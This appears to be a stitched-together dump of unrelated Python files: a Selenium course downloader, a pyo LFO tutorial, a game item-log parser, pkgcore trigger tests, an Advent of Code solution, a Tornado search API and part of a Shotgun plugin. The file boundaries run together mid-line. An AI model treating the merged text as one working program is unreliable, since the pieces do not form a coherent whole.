os.path.abspath(sys.argv[1]).rstrip("/") + "/" # Get username from user. username = ask_user("Username?") password = ask_user("Password?") # Create a new webdriver. logging.info("Booting...") prefs = {"download.default_directory": out_dir} options = webdriver.ChromeOptions() options.add_argument("--disable-dev-shm-usage") options.add_argument("--no-sandbox") options.add_experimental_option('prefs', prefs) driver = webdriver.Chrome(executable_path="./chromedriver", chrome_options=options) logging.info("Authenticating...") login(driver, username, password) logging.info("Getting courses...") courses = get_courses(driver) logging.info(f"Found {len(courses)} courses. (They are: {str(courses)})") for ci, course in enumerate(courses): logging.info(f"Downloading {ci + 1}/{len(courses)}") download_documents(driver, course) download_student_publications(driver, course) download_dropbox(driver, course) logging.info("Done!") 0 """ 04-building-lfo.py - Audio control of parameters. One of the most important thing with computer music is the trajectories taken by parameters over time. This is what gives life to the synthesized sound. One way to create moving values is by connecting a low frequency oscillator to an object's attribute. This script shows that process. Other possibilities that will be covered later use random class objects or feature extraction from an audio signal. """ from pyo import * s = Server().boot() # Creates a noise source n = Noise() # Creates an LFO oscillating +/- 500 around 1000 (filter's frequency) lfo1 = Sine(freq=0.1, mul=500, add=1000) # Creates an LFO oscillating between 2 and 8 (filter's Q) lfo2 = Sine(freq=0.4).range(2, 8) # Creates a dynamic bandpass filter applied to the noise source bp1 = ButBP(n, freq=lfo1, q=lfo2).out() # The LFO object provides more waveforms than just a sine wave # Creates a ramp oscillating +/- 1000 around 12000 (filter's frequency) lfo3 = LFO(freq=0.25, type=1, mul=1000, add=1200) # Creates a square oscillating between 4 and 12 (filter's Q) lfo4 = LFO(freq=4, type=2).range(4, 12) # Creates a second dynamic bandpass filter applied to the noise source bp2 = ButBP(n, freq=lfo3, q=lfo4).out(1) s.gui(locals()) DavFount/D2BSItemLog-Parser # --------------------------- # D2BS: Item Logger # --------------------------- # edit your profile.js to enable item logging, example: # # Config.ItemInfo = true; // Log stashed, skipped (due to no space) or sold items. # Config.ItemInfoQuality = [6, 7, 8]; # # 6, 7, 8 reprensent item quality to be logged to itemlog file # lowquality = 1 # normal = 2 # superior = 3 # magic = 4 # set = 5 # rare = 6 # unique = 7 # crafted = 8 import json import os import requests import time import random import re import string from getpass import getpass print('Hello!') # API Webhook api_url = 'http://localhost:3000/api/v1/items' api_login_url = 'http://localhost:3000/api/v1/login' api_token = '' # path to itemlog.txt (remember to escape) # c:\users\bob\ ==> should be ==> c:\\users\\bob\\ itemlog = 'P:\\d2bs2\\trunk\\d2bs\\kolbot\\logs\\ItemLog.txt' # limit of lines in itemlog.txt before we try to empty it # if this gets too big it might stall your system itemlog_max_lines = 5000 # sleep time in seconds between each check of itemlog.txt sleep_between_checks = 30 # actions to post # valid actions: # 'Sold', 'Shopped', 'Gambled', 'Dropped', 'No room for' # 'Kept', 'Field Kept', 'Runeword Kept', 'Cubing Kept' always_actions = ['Sold', 'Shopped', 'Gambled', 'Dropped', 'No room for', 'Kept', 'Field Kept', 'Runeword Kept', 'Cubing Kept'] # == END OF SETTINGS == def send_to_api(itemInfo): headers = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + api_token} payload = json.dumps(itemInfo, indent=4) r = requests.post(api_url, data=payload, headers=headers) def login(userInfo): headers = {'Content-Type': 'application/json'} payload = json.dumps(userInfo, indent=4) r = requests.post(api_login_url, data=payload, headers=headers) json_r = r.json() global api_token api_token = json_r['token'] if(api_token): print(f'You are logged now logged in as {json_r["result"]["name"]}.') main() def generate_event_id(n): id = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(n)) return id def empty_logfile(): try: with open(itemlog, 'w'): return True except: return False def main(): current_line = 0 while True: try: with open(itemlog) as f: lines = f.readlines() except: print( f'[FAIL] failed to open itemlog - retrying in {sleep_between_checks} seconds..') time.sleep(sleep_between_checks) continue if current_line == 0: current_line = len(lines)-10 continue for idx, line in enumerate(lines): if idx >= current_line: regex = r'\[(.+?)\] <(.+?)> <(.+?)> <(.+?)> <(.+?)> <(.+?)> \((.+?)\) (.+?)$|$' match = re.search(regex, line) if match: timestamp = match.group(1) profile = match.group(2) character = match.group(3) difficulty = match.group(4) area = match.group(5) action = match.group(6) quality = match.group(7) dateTime = timestamp.split(' ') item = match.group(8) itemArray = [] itemStats = [] itemName = '' # Item has additional stats if '|' in item: itemArray = item.split(' | ') # Cost is found and ignored. The item stats start at the third element of the array if 'cost' in itemArray[0].lower(): itemName = itemArray[1] itemStats = itemArray[2:] itemStats = list(filter(None, itemStats)) # Cost is not found and the item stats begin at the second element of the array else: itemName = itemArray[0] itemStats = itemArray[1:] itemStats = list(filter(None, itemStats)) # No additional stats and the item name is present in group 6 else: itemName = item # Check to see if the action is enabled to log (Default: All) if action not in always_actions: continue # Generate a unique ID for a Database event_id = generate_event_id(8) # Send to the API send_to_api(itemInfo={ "date": dateTime[0], "time": dateTime[1], "profile": profile, "character": character, "difficulty": difficulty, "area": area, "action": action, "quality": quality, "itemName": itemName, "stats": itemStats }) else: print(f'Unable to parse {line}.') current_line = len(lines) if current_line >= itemlog_max_lines: print(f'[WARN] itemlog is {current_line} lines - emptying..') if empty_logfile(): current_line = 0 print('[OK] itemlog is now empty') else: print('[FAIL] failed to wipe itemlog!!') print( f'[OK] done checking itemlog - sleeping for {sleep_between_checks} seconds..') time.sleep(sleep_between_checks) def promptLogin(): username = input('Enter your username: ') password = getpass('Enter your password (input hidden): ') login(userInfo={ "name": username, "password": password }) if __name__ == '__main__': print(f'[START] Greetings! :-)') print(f'[OK] logfile: {itemlog}') print(f'------------') promptLogin() 1-10 # Copyright: 2007-2011 <> # License: GPL2/BSD from itertools import izip from math import floor, ceil import os import shutil import time from snakeoil.currying import post_curry from snakeoil.osutils import pjoin, ensure_dirs, normpath from snakeoil.test import mixins from pkgcore import spawn from pkgcore.fs import fs from pkgcore.merge import triggers, const from pkgcore.fs.contents import contentsSet from pkgcore.fs.livefs import gen_obj, scan from pkgcore.test import TestCase, SkipTest from pkgcore.test.merge.util import fake_trigger, fake_engine, fake_reporter class TestBase(TestCase): kls = fake_trigger def mk_trigger(self, kls=None, **kwargs): if kls is None: kls = self.kls return kls(**kwargs) def test_default_attrs(self): for x in ("required_csets", "_label", "_hooks", "_engine_types"): self.assertEqual(None, getattr(self.kls, x), msg="%s must exist and be None" % x) self.assertEqual(50, self.kls.priority) def test_label(self): self.assertEqual(self.mk_trigger().label, str(self.kls.__name__)) self.assertEqual(fake_trigger().label, str(fake_trigger.__name__)) self.assertEqual(fake_trigger(_label='foon').label, 'foon') def test_localize(self): o = self.mk_trigger() self.assertEqual(o, o.localize(None)) def test_get_required_csets(self): self.assertEqual(fake_trigger(required_csets=None).get_required_csets( None), None) self.assertEqual(fake_trigger(required_csets=None).get_required_csets( 1), None) self.assertEqual(fake_trigger(required_csets=None).get_required_csets( ""), None) o = fake_trigger(required_csets={"foo":["dar"], "bar":1}) self.assertEqual(o.get_required_csets("foo"), ["dar"]) self.assertEqual(o.get_required_csets("bar"), 1) self.assertEqual(fake_trigger(required_csets=("dar", "foo")) .get_required_csets("bar"), ("dar", "foo")) self.assertEqual(fake_trigger(required_csets=()) .get_required_csets(""), ()) def test_register(self): engine = fake_engine(mode=1) self.assertRaises(TypeError, self.mk_trigger(mode=1).register, engine) self.assertRaises(TypeError, self.mk_trigger(mode=1, _hooks=2).register, engine) self.assertFalse(engine._triggers) # shouldn't puke. o = self.mk_trigger(mode=1, _hooks=("2")) o.register(engine) self.assertEqual(engine._triggers, [('2', o, None)]) engine._triggers = [] # verify it's treating "all csets" differently from "no csets" o = self.mk_trigger(mode=1, _hooks=("2"), required_csets=()) o.register(engine) self.assertEqual(engine._triggers, [('2', o, ())]) # should handle keyerror thrown from the engine for missing hooks. engine = fake_engine(mode=1, blocked_hooks=("foon", "dar")) self.mk_trigger(mode=1, _hooks="foon").register(engine) self.mk_trigger(mode=1, _hooks=("foon", "dar")).register(engine) self.assertFalse(engine._triggers) o = self.mk_trigger(mode=1, _hooks=("foon", "bar"), required_csets=(3,)) o.register(engine) self.assertEqual(engine._triggers, [('bar', o, (3,))]) engine._triggers = [] o = self.mk_trigger(mode=1, _hooks="bar", required_csets=None) o.register(engine) self.assertEqual(engine._triggers, [('bar', o, None)]) def test_call(self): # test "I want all csets" def get_csets(required_csets, csets, fallback=None): o = self.mk_trigger(required_csets={1:required_csets, 2:fallback}, mode=(1,)) engine = fake_engine(csets=csets, mode=1) o(engine, csets) self.assertEqual([x[0] for x in o._called], [engine]*len(o._called)) return [list(x[1:]) for x in o._called] d = object() self.assertEqual(get_csets(None, d, [1]), [[d]], msg="raw csets mapping should be passed through without conversion" " for required_csets=None") self.assertEqual(get_csets([1,2], {1:1,2:2}), [[1, 2]], msg="basic mapping through failed") self.assertEqual(get_csets([], {}), [[]], msg="for no required csets, must have no args passed") class test_module(TestCase): def test_constants(self): self.assertEqual(sorted([const.REPLACE_MODE, const.UNINSTALL_MODE]), sorted(triggers.UNINSTALLING_MODES)) self.assertEqual(sorted([const.REPLACE_MODE, const.INSTALL_MODE]), sorted(triggers.INSTALLING_MODES)) class Test_mtime_watcher(mixins.TempDirMixin, TestCase): kls = triggers.mtime_watcher def test_identification(self): o = [gen_obj(self.dir)] t = self.kls() t.set_state([self.dir]) self.assertEqual(list(t.saved_mtimes), o) open(pjoin(self.dir, 'file'), 'w').close() t.set_state([self.dir, pjoin(self.dir, 'file')]) self.assertEqual(list(t.saved_mtimes), o) loc = pjoin(self.dir, 'dir') os.mkdir(loc) o.append(gen_obj(pjoin(self.dir, 'dir'))) o.sort() t.set_state([x.location for x in o]) self.assertEqual(sorted(t.saved_mtimes), o) # test syms. src = pjoin(self.dir, 'dir2') os.mkdir(src) loc = pjoin(self.dir, 'foo') os.symlink(src, loc) locs = [x.location for x in o] # insert a crap location to ensure it handles it. locs.append(pjoin(self.dir, "asdfasdfasdfasfdasdfasdfasdfasdf")) locs.append(src) i = gen_obj(src, stat=os.stat(src)) o.append(i) o.sort() t.set_state(locs) self.assertEqual(sorted(t.saved_mtimes), o) locs[-1] = loc o.remove(i) i = i.change_attributes(location=loc) o.append(i) o.sort() t.set_state(locs) self.assertEqual(sorted(t.saved_mtimes), o) o.remove(i) os.rmdir(src) # check stat_func usage; if lstat, the sym won't be derefed, # thus ignored. t.set_state(locs, stat_func=os.lstat) self.assertEqual(sorted(t.saved_mtimes), o) open(pjoin(self.dir, 'bar'), 'w').close() self.assertTrue(t.check_state()) # test dead sym filtering for stat. t.set_state(locs) self.assertEqual(sorted(t.saved_mtimes), o) self.assertFalse(t.check_state()) def test_float_mtime(self): t = self.kls() t.set_state([self.dir]) l = list(t.saved_mtimes) self.assertEqual(len(l), 1) l = l[0] # mtime *must* be a float. self.assertInstance(l.mtime, float) def test_race_protection(self): # note this isn't perfect- being a race, triggering it on # demand is tricky. # hence the 10x loop; can trigger it pretty much each loop # for my 1ghz, so... it's a start. # the race specifically will only rear its head on extremely # fast io (crazy hardware, or async mount), fs's lacking subsecond, # and just severely crappy chance. # faster the io actions, easier it is to trigger. t = self.kls() for x in xrange(100): now = ceil(time.time()) + 1 os.utime(self.dir, (now + 100, now + 100)) t.set_state([self.dir]) now, st_mtime = time.time(), os.stat(self.dir).st_mtime now, st_mtime = ceil(now), floor(st_mtime) self.assertTrue(now > st_mtime, msg="%r must be > %r" % (now, st_mtime)) def castrate_trigger(base_kls, **kwargs): class castrated_trigger(base_kls): enable_regen = False def __init__(self, *args2, **kwargs2): self._passed_in_args = [] base_kls.__init__(self, *args2, **kwargs2) def regen(self, *args): self._passed_in_args.append(list(args)) if self.enable_regen: return base_kls.regen(self, *args) return [] locals().update(kwargs) return castrated_trigger class trigger_mixin(mixins.TempDirMixin): def setUp(self): mixins.TempDirMixin.setUp(self) self.reset_objects() def reset_objects(self, mode=const.INSTALL_MODE): self.engine = fake_engine(offset=self.dir, mode=mode) self.trigger = self.kls() def assertPaths(self, expected, tested): expected = sorted(expected) tested = sorted(tested) self.assertEqual(expected, tested, msg="expected %r, got %r" % (expected, tested)) class Test_ldconfig(trigger_mixin, TestCase): # use the kls indirection for when *bsd version of ldconfig trigger # is derived; will be pretty much the same, sans the trigger call. kls = castrate_trigger(triggers.ldconfig) def test_read_ld_so_conf(self): # test the defaults first. should create etc and the file. self.assertPaths(self.trigger.read_ld_so_conf(self.dir), [pjoin(self.dir, x) for x in self.trigger.default_ld_path]) o = gen_obj(pjoin(self.dir, 'etc')) self.assertEqual(o.mode, 0755) self.assertTrue(fs.isdir(o)) self.assertTrue(os.path.exists(pjoin(self.dir, 'etc/ld.so.conf'))) # test normal functioning. with open(pjoin(self.dir, 'etc/ld.so.conf'), 'w') as f: f.write("\n".join(["/foon", "dar", "blarnsball", "#comment"])) self.assertPaths(self.trigger.read_ld_so_conf(self.dir), [pjoin(self.dir, x) for x in ["foon", "dar", "blarnsball"]]) def assertTrigger(self, touches, ran, dirs=['test-lib', 'test-lib2'], hook='merge', mode=const.INSTALL_MODE, mkdirs=True, same_mtime=False): # wipe whats there. for x in scan(self.dir).iterdirs(): if x.location == self.dir: continue shutil.rmtree(x.location) for x in scan(self.dir).iterdirs(True): os.unlink(x.location) ensure_dirs(pjoin(self.dir, "etc")) with open(pjoin(self.dir, "etc/ld.so.conf"), "w") as f: f.write("\n".join('/' + x for x in dirs)) # force directory mtime to 1s less. past = time.time() - 10.0 if mkdirs: for x in dirs: ensure_dirs(pjoin(self.dir, x)) os.utime(pjoin(self.dir, x), (past, past)) self.reset_objects() self.engine.phase = 'pre_%s' % hook self.engine.mode = mode self.trigger(self.engine, {}) self.assertFalse(self.trigger._passed_in_args) resets = set() for x in touches: fp = pjoin(self.dir, x.lstrip('/')) open(pjoin(fp), "w").close() if same_mtime: os.utime(fp, (past, past)) resets.add(os.path.dirname(fp)) for x in resets: os.utime(x, (past, past)) self.engine.phase = 'post_%s' % hook self.trigger(self.engine, {}) self.assertEqual([[getattr(x, 'offset', None) for x in y] for y in self.trigger._passed_in_args], [[self.dir]]) def test_trigger(self): # ensure it doesn't explode for missing dirs. #self.assertTrigger([], False, mkdirs=False) #self.assertTrigger([], False) self.assertTrigger(['test-lib/foon'], True) self.assertTrigger(['test-lib/foon'], False, same_mtime=True) class TestInfoRegen(trigger_mixin, TestCase): raw_kls = triggers.InfoRegen @property def kls(self): return castrate_trigger(self.raw_kls, locations=['/']) info_data = \ """INFO-DIR-SECTION Network Applications START-INFO-DIR-ENTRY * Wget: (wget). The non-interactive network downloader. END-INFO-DIR-ENTRY """ def reset_objects(self, **kwargs): trigger_mixin.reset_objects(self, **kwargs) self.trigger.location = [self.dir] def test_binary_path(self): existing = os.environ.get("PATH", self) try: try: path = spawn.find_binary('install-info') except spawn.CommandNotFound: path = None self.assertEqual(path, self.trigger.get_binary_path()) if path is not self: os.environ["PATH"] = "" self.assertEqual(None, self.trigger.get_binary_path()) finally: if existing is self: os.environ.pop("PATH", None) else: os.environ["PATH"] = existing def test_regen(self): o = self.raw_kls() path = o.get_binary_path() if path is None: raise SkipTest("can't verify regen behaviour due to install-info " "not being available") # test it without the directory existing. self.assertEqual(list(o.regen(path, pjoin(self.dir, 'foo'))), []) self.assertFalse(os.path.exists(pjoin(self.dir, 'foo'))) with open(pjoin(self.dir, "foo.info"), 'w') as f: f.write(self.info_data) # no issues. self.assertEqual(list(o.regen(path, self.dir)), []) self.assertTrue(os.path.exists(pjoin(self.dir, 'dir')), msg="info dir file wasn't created") # drop the last line, verify it returns that file. with open(pjoin(self.dir, "foo2.info"), 'w') as f: f.write('\n'.join(self.info_data.splitlines()[:-1])) # should ignore \..* files open(pjoin(self.dir, ".foo.info"), 'w').close() os.unlink(pjoin(self.dir, 'dir')) self.assertEqual(list(o.regen(path, self.dir)), [pjoin(self.dir, 'foo2.info')]) self.assertTrue(os.path.exists(pjoin(self.dir, 'dir')), msg="info dir file wasn't created") def run_trigger(self, phase, expected_regen=[]): l = [] class foo: warn = staticmethod(l.append) self.engine.observer = foo() self.trigger._passed_in_args = [] self.engine.phase = phase self.trigger(self.engine, {}) self.assertEqual(map(normpath, (x[1] for x in self.trigger._passed_in_args)), map(normpath, expected_regen)) return l def test_trigger(self): if self.raw_kls().get_binary_path() is None: raise SkipTest( "can't verify regen behaviour due to install-info not being available") cur = os.environ.get("PATH", self) try: os.environ.pop("PATH", None) # shouldn't run if the binary is missing # although it should warn, and this code will explode when it does. self.engine.phase = 'post_merge' self.assertEqual(None, self.trigger(self.engine, {})) finally: if cur is not self: os.environ["PATH"] = cur # verify it runs when dir is missing. # doesn't create the file since no info files. self.reset_objects() self.assertFalse(self.run_trigger('pre_merge', [])) self.assertFalse(self.run_trigger('post_merge', [self.dir])) # add an info, and verify it generated. with open(pjoin(self.dir, 'foo.info'), 'w') as f: f.write(self.info_data) self.reset_objects() self.trigger.enable_regen = True self.assertFalse(self.run_trigger('pre_merge', [])) self.assertFalse(self.run_trigger('post_merge', [self.dir])) # verify it doesn't; mtime is fine self.reset_objects() self.trigger.enable_regen = True self.assertFalse(self.run_trigger('pre_merge', [])) self.assertFalse(self.run_trigger('post_merge', [])) # verify it handles quoting properly, and that it ignores # complaints about duplicates. self.reset_objects() self.trigger.enable_regen = True self.assertFalse(self.run_trigger('pre_merge', [])) with open(pjoin(self.dir, "blaidd drwg.info"), "w") as f: f.write(self.info_data) self.assertFalse(self.run_trigger('post_merge', [self.dir])) # verify it passes back failures. self.reset_objects() self.trigger.enable_regen = True self.assertFalse(self.run_trigger('pre_merge', [])) with open(pjoin(self.dir, "tiza grande.info"), "w") as f: f.write('\n'.join(self.info_data.splitlines()[:-1])) l = self.run_trigger('post_merge', [self.dir]) self.assertEqual(len(l), 1) self.assertIn('tiza grande.info', l[0]) # verify it holds off on info regen till after unmerge for replaces. self.reset_objects(mode=const.REPLACE_MODE) self.assertFalse(self.run_trigger('pre_merge', [])) self.assertFalse(self.run_trigger('post_merge', [])) self.assertFalse(self.run_trigger('pre_unmerge', [])) os.unlink(pjoin(self.dir, "tiza grande.info")) self.assertFalse(self.run_trigger('post_unmerge', [self.dir])) class single_attr_change_base(object): kls = triggers.fix_uid_perms attr = None bad_val = 1 @staticmethod def good_val(val): return 2 def test_metadata(self): self.assertEqual(self.kls._engine_types, triggers.INSTALLING_MODES) self.assertEqual(self.kls.required_csets, ('new_cset',)) self.assertEqual(self.kls._hooks, ('pre_merge',)) @property def trigger(self): return self.kls(1, 2) def assertContents(self, cset=()): orig = sorted(cset) new = contentsSet(orig) self.trigger(fake_engine(mode=const.INSTALL_MODE), {'new_cset':new}) new = sorted(new) self.assertEqual(len(orig), len(new)) for x, y in izip(orig, new): self.assertEqual(orig.__class__, new.__class__) for attr in x.__attrs__: if self.attr == attr: val = getattr(x, attr) if self.bad_val is not None and val == self.bad_val: self.assertEqual(self.good_val(val), getattr(y, attr)) else: self.assertEqual(self.good_val(val), getattr(y, attr)) elif attr != 'chksums': # abuse self as unique singleton. self.assertEqual(getattr(x, attr, self), getattr(y, attr, self)) def test_trigger(self): self.assertContents() self.assertContents([fs.fsFile("/foon", mode=0644, uid=2, gid=1, strict=False)]) self.assertContents([fs.fsFile("/foon", mode=0646, uid=1, gid=1, strict=False)]) self.assertContents([fs.fsFile("/foon", mode=04766, uid=1, gid=2, strict=False)]) self.assertContents([fs.fsFile("/blarn", mode=02700, uid=2, gid=2, strict=False), fs.fsDir("/dir", mode=0500, uid=2, gid=2, strict=False)]) self.assertContents([fs.fsFile("/blarn", mode=02776, uid=2, gid=2, strict=False), fs.fsDir("/dir", mode=02777, uid=1, gid=2, strict=False)]) self.assertContents([fs.fsFile("/blarn", mode=06772, uid=2, gid=2, strict=False), fs.fsDir("/dir", mode=04774, uid=1, gid=1, strict=False)]) class Test_fix_uid_perms(single_attr_change_base, TestCase): kls = triggers.fix_uid_perms attr = 'uid' class Test_fix_gid_perms(single_attr_change_base, TestCase): kls = triggers.fix_gid_perms attr = 'gid' class Test_fix_set_bits(single_attr_change_base, TestCase): kls = triggers.fix_set_bits trigger = property(lambda self:self.kls()) attr = 'mode' @staticmethod def good_val(val): if val & 06000 and val & 0002: return val & ~06002 return val class Test_detect_world_writable(single_attr_change_base, TestCase): kls = triggers.detect_world_writable _trigger_override = None attr = 'mode' @property def trigger(self): if self._trigger_override is None: return self.kls(fix_perms=True) return self._trigger_override() def good_val(self, val): self.assertEqual(self._trigger_override, None, msg="bug in test code; good_val should not be invoked when a " "trigger override is in place.") return val & ~0002 def test_lazyness(self): # ensure it doesn't even look if it won't make noise, and no reporter # cset is intentionally *not* a contentset; it'll explode it it tries # to access it. self.kls().trigger(fake_engine(), None) # now verify that the explosion would occur if either settings are on. self.assertRaises((AttributeError, TypeError), self.kls().trigger, fake_engine(observer=object()), None) self.assertRaises((AttributeError, TypeError), self.kls(fix_perms=True).trigger, fake_engine(), None) def test_observer_warn(self): warnings = [] engine = fake_engine(observer=fake_reporter(warn=warnings.append)) self._trigger_override = self.kls() def run(fs_objs, fix_perms=False): self.kls(fix_perms=fix_perms).trigger(engine, contentsSet(fs_objs)) run([fs.fsFile('/foon', mode=0770, strict=False)]) self.assertFalse(warnings) run([fs.fsFile('/foon', mode=0772, strict=False)]) self.assertEqual(len(warnings), 1) self.assertIn('/foon', warnings[0]) warnings[:] = [] run([fs.fsFile('/dar', mode=0776, strict=False), fs.fsFile('/bar', mode=0776, strict=False), fs.fsFile('/far', mode=0770, strict=False)]) self.assertEqual(len(warnings), 2) self.assertIn('/dar', ' '.join(warnings)) self.assertIn('/bar', ' '.join(warnings)) self.assertNotIn('/far', ' '.join(warnings)) class TestPruneFiles(TestCase): kls = triggers.PruneFiles def test_metadata(self): self.assertEqual(self.kls.required_csets, ('new_cset',)) self.assertEqual(self.kls._hooks, ('pre_merge',)) self.assertEqual(self.kls._engine_types, triggers.INSTALLING_MODES) def test_it(self): orig = contentsSet([ fs.fsFile('/cheddar', strict=False), fs.fsFile('/sporks-suck', strict=False), fs.fsDir('/foons-rule', strict=False), fs.fsDir('/mango', strict=False) ]) engine = fake_engine(mode=const.INSTALL_MODE) def run(func): new = contentsSet(orig) self.kls(func)(engine, {'new_cset':new}) return new self.assertEqual(orig, run(lambda s:False)) self.assertEqual([], run(post_curry(isinstance, fs.fsDir)).dirs()) self.assertEqual(sorted(orig.files()), sorted(run(post_curry(isinstance, fs.fsDir)).dirs(True))) # check noisyness. info = [] engine = fake_engine(observer=fake_reporter(info=info.append), mode=const.REPLACE_MODE) run(lambda s:False) self.assertFalse(info) run(post_curry(isinstance, fs.fsDir)) self.assertEqual(len(info), 2) # ensure only the relevant files show. self.assertNotIn('/cheddar', ' '.join(info)) self.assertNotIn('/sporks-suck', ' '.join(info)) self.assertIn('/foons-rule', ' '.join(info)) self.assertIn('/mango', ' '.join(info)) orhtej2/adventofcode2019/python/07/aoc2019_07/case02.py0 from functools import partial, partialmethod from . import amplifier class _ReachedOutput(Exception): def __init__(self, value): self.value = value def _func(value): raise _ReachedOutput(value) class Chain: def __init__(self, program, configuration): self.program = program self.configuration = configuration def __call__(self): amps = [amplifier.Amplifier(dict(self.program), self.configuration[i]) for i in range(5)] for i in range(5): amps[i].output = _func stage = 0 result = 0 while True: try: #print(f'Running stage {stage} with input {result}') amps[stage](result) return result except _ReachedOutput as e: #print(f'Got out, {e.value}') result = e.value stage += 1 stage %= 5 return resultimport json import logging from collections import OrderedDict from datetime import datetime import pkg_resources from tornado.locale import get_supported_locales from tornado.web import RequestHandler from . import pageutils from .bases import BaseHTMLHandler, BaseAPIHandler from .dispatch import DatabaseMixin, route from .models.indexer import db_expert, types from .models.mine_models import CardIndex, AccessoryIndex @route(r"/cards/search") class CardSearch(BaseHTMLHandler, DatabaseMixin): SUPPORTED_LANGS = ["en", "ja"] def indexes_for_lang(self): if self.locale.code in self.SUPPORTED_LANGS: code = self.locale.code else: code = self.SUPPORTED_LANGS[0] return [ self.static_url(f"search/card.base.{code}.json"), self.static_url(f"search/card.skills.enum.{code}.json"), self.static_url(f"search/card.presets.{code}.json"), ] def dictionary_for_lang(self): return self.static_url("search/dictionary.dummy.json") def get(self): self.render( "card_search_scaffold.html", config_indexes=self.indexes_for_lang(), config_dictionary=self.dictionary_for_lang(), ) @route(r"/api/private/search/cards/results.json") class CardSearchExec(BaseAPIHandler, DatabaseMixin): FIELD_BLACKLIST = ["release_dates"] INDEX = CardIndex DEFAULT_SORT = ("ordinal", True) def look_up_schema_field(self, field_name: str) -> types.Field: names = field_name.split(".") assert len(names) > 0 if names[0] in self.FIELD_BLACKLIST or field_name in self.FIELD_BLACKLIST: raise KeyError(names[0]) root = self.INDEX[names[0]] for name in names[1:]: root = root[name] return root def is_fts_table(self, field_name: str) -> bool: return field_name in self.INDEX.fts_bond_tables def _error(self, status, message): self.set_status(status) self.write({"error": message}) self.finish() async def post(self): try: query = json.loads(self.request.body) except json.JSONDecodeError: self.set_status(400) self.write({"error": "Invalid payload."}) return fts_bonds = {} clean_query_presort: List[Tuple[Iterable[int], str, dict]] = [] for field, value in query.items(): if field.startswith("_"): continue if self.is_fts_table(field): if value: fts_bonds[field] = ("card_fts_cfg_english", value) continue try: scmfield = self.look_up_schema_field(field) except KeyError: return self._error(400, f"Unknown field: {field}") behaviour = scmfield.behaviour or {} if scmfield.field_type == types.FIELD_TYPE_INT and ( scmfield.map_enum_to_id is not None or behaviour.get("captain_treat_as") == "enum" ): if behaviour.get("compare_type") == "bit-set": if isinstance(value, int): clean_query_presort.append((scmfield.order, field, {"value": [value]})) elif isinstance(value, list) and all(isinstance(x, int) for x in value): clean_query_presort.append( (scmfield.order, field, {"value": value, "exclude": True}) ) else: return self._error( 400, f"{field}: The value must be a list of integers, or a single integer, for bit-sets.", ) else: if not isinstance(value, int): return self._error(400, f"{field}: The value must be an integer.") clean_query_presort.append( (scmfield.order, field, {"value": value, "compare_type": "eq"}) ) elif scmfield.field_type == types.FIELD_TYPE_INT: if not isinstance(value, dict) or "compare_to" not in value: return self._error(400, f"{field}: Invalid integer payload.") value["value"] = value.pop("compare_to") clean_query_presort.append((scmfield.order, field, value)) elif ( scmfield.field_type == types.FIELD_TYPE_STRING or scmfield.field_type == types.FIELD_TYPE_STRINGMAX ): if not isinstance(value, str): return self._error(400, f"{field}: Invalid string payload.") clean_query_presort.append((scmfield.order, field, {"value": str(value)})) elif scmfield.field_type == types.FIELD_TYPE_DATETIME: try: clean_query_presort.append( (scmfield.order, field, {"value": datetime.fromisoformat(value)}) ) except ValueError: return self._error(400, f"{field}: Invalid format") clean_query_presort.sort(key=lambda x: x[0]) clean_query = OrderedDict(x[1:] for x in clean_query_presort) if "id" in clean_query: clean_query["id"]["return"] = True else: clean_query["id"] = {"return": True} clean_query.move_to_end("id", last=False) order_by = None order_desc = False sort_key = query.get("_sort") if sort_key: try: f = self.look_up_schema_field(sort_key[1:]) except KeyError: pass else: order_by = sort_key[1:] order_desc = True if sort_key[0] == "-" else False else: order_by, order_desc = self.DEFAULT_SORT if order_by in clean_query: clean_query[order_by]["return"] = True elif order_by: clean_query[order_by] = {"return": True} expert = db_expert.PostgresDBExpert(self.INDEX) async with self.database().pool.acquire() as connection, connection.transaction(): # We generate a lot of SQL when building queries. Assuming there will eventually # be a few injection bugs, set this to try and prevent some of the damage. await connection.execute("SET TRANSACTION READ ONLY") res = await expert.run_query(connection, clean_query, fts_bonds, order_by, order_desc) self.write({"result": [r["id"] for r in res]}) @route(r"/accessories/search") class AccessorySearch(BaseHTMLHandler, DatabaseMixin): SUPPORTED_LANGS = ["en"] def indexes_for_lang(self): if self.locale.code in self.SUPPORTED_LANGS: code = self.locale.code else: code = self.SUPPORTED_LANGS[0] return [ self.static_url(f"search/accessory.base.{code}.json"), self.static_url(f"search/accessory.skills.enum.{code}.json"), ] def dictionary_for_lang(self): return self.static_url("search/dictionary.dummy.json") def get(self): self.render( "accessory_search_scaffold.html", config_indexes=self.indexes_for_lang(), config_dictionary=self.dictionary_for_lang(), ) @route(r"/api/private/search/accessories/results.json") class AccessorySearchExec(CardSearchExec): FIELD_BLACKLIST = ["role"] INDEX = AccessoryIndex DEFAULT_SORT = ("ordinal", False) src/plugins/pluginManager.py1-10 """ For detailed information about the event loop, please see http://shotgunsoftware.github.com/shotgunEvents/api.html This plugin allows to control plugins from Shotgun. To use it : - Enable a Custom Non Project Entity in Shotgun, rename it to Plugins ( or whatever name you fancy ). - Change the status field to only accept 'Active' and 'Disabled' status - Add a 'Script Path' File/Link field to the entity, to control where a plugin script will be. - Add a 'Ignore Projects' multi entity Project field to the entity, to control the list of projects where a plugin shouldn't be active. - Edit your shotgunEventDaemon.conf file, and add the section : [pluginManager] sgEntity : CustomNonProjectEntity15 # the entity you enabled script_key = ??????? # The Shotgun script key to use by the pluginManager plugin script_name = ?????? # The Shotgun script name to use by the pluginManager plugin - Copy this file in a place where your shotgunEventDaemon.py script can find it - You will have to create Local File storage for places where you want to release your plugins """ import logging import os import shotgun_api3 as sg import re import sys def registerCallbacks(reg): """ Register attribute and entity changes callbacks for plugins registered in Shotgun. Load plugins registered in Shotgun """ reg.logger.debug('Loading pluginManager plugin.') # Retrieve config values my_name = reg.getName() cfg = reg.getConfig() if not cfg : raise ConfigError( "No config file found") reg.logger.debug( "Loading config for %s" % reg.getName() ) settings = {} keys = [ 'sgEntity', 'script_key', 'script_name'] for k in keys : settings[k] = cfg.get( my_name, k ) reg.logger.debug( "Using %s %s" % ( k, settings[k] ) ) # We will need access to the Engine from callbacks settings['engine'] = reg.getEngine() # Register all callbacks related to our custom entity # Attribute change callback eventFilter = { r'Shotgun_%s_Change' % settings['sgEntity'] : ['sg_status_list', 'sg_script_path', 'sg_ignore_projects' ] } reg.logger.debug("Registring %s", eventFilter ) reg.registerCallback( settings['script_name'], settings['script_key'], changeEventCB, 